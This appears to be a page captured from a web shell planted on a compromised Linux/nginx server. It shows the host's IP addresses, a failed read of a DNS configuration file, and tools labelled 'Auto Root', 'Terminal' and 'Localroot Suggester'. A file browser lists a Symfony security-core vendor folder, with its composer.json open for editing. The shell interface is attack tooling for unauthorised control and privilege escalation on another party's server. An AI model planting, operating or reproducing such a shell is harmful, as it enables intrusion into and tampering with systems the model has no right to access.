Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.222.23.166
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
vendor /
symfony /
security-core /
Delete
Unzip
Name
Size
Permission
Date
Action
Authentication
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
Authorization
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
Encoder
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
Event
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
Exception
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
Resources
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
Role
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
Signature
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
Test
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
User
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
Validator
[ DIR ]
drwxrwxr-x
2022-07-20 13:00
AuthenticationEvents.php
1.39
KB
-rw-rw-r--
2022-07-20 13:00
CHANGELOG.md
1.93
KB
-rw-rw-r--
2022-07-20 13:00
LICENSE
1.04
KB
-rw-rw-r--
2022-07-20 13:00
README.md
2.16
KB
-rw-rw-r--
2022-07-20 13:00
Security.php
1.89
KB
-rw-rw-r--
2022-07-20 13:00
composer.json
1.97
KB
-rw-rw-r--
2022-07-20 13:00
Save
Rename
{ "name": "symfony/security-core", "type": "library", "description": "Symfony Security Component - Core Library", "keywords": [], "homepage": "https://symfony.com", "license": "MIT", "authors": [ { "name": "Fabien Potencier", "email": "fabien@symfony.com" }, { "name": "Symfony Community", "homepage": "https://symfony.com/contributors" } ], "require": { "php": ">=7.2.5", "symfony/event-dispatcher-contracts": "^1.1|^2|^3", "symfony/polyfill-php80": "^1.16", "symfony/service-contracts": "^1.1.6|^2|^3", "symfony/deprecation-contracts": "^2.1|^3", "symfony/password-hasher": "^5.3|^6.0" }, "require-dev": { "psr/container": "^1.0|^2.0", "psr/cache": "^1.0|^2.0|^3.0", "symfony/cache": "^4.4|^5.0|^6.0", "symfony/event-dispatcher": "^4.4|^5.0|^6.0", "symfony/expression-language": "^4.4|^5.0|^6.0", "symfony/http-foundation": "^5.3|^6.0", "symfony/ldap": "^4.4|^5.0|^6.0", "symfony/translation": "^4.4|^5.0|^6.0", "symfony/validator": "^5.2|^6.0", "psr/log": "^1|^2|^3" }, "conflict": { "symfony/event-dispatcher": "<4.4", "symfony/http-foundation": "<5.3", "symfony/security-guard": "<4.4", "symfony/ldap": "<4.4", "symfony/validator": "<5.2" }, "suggest": { "psr/container-implementation": "To instantiate the Security class", "symfony/event-dispatcher": "", "symfony/http-foundation": "", "symfony/validator": "For using the user password constraint", "symfony/expression-language": "For using the expression voter", "symfony/ldap": "For using LDAP integration" }, "autoload": { "psr-4": { "Symfony\\Component\\Security\\Core\\": "" }, "exclude-from-classmap": [ "/Tests/" ] }, "minimum-stability": "dev" }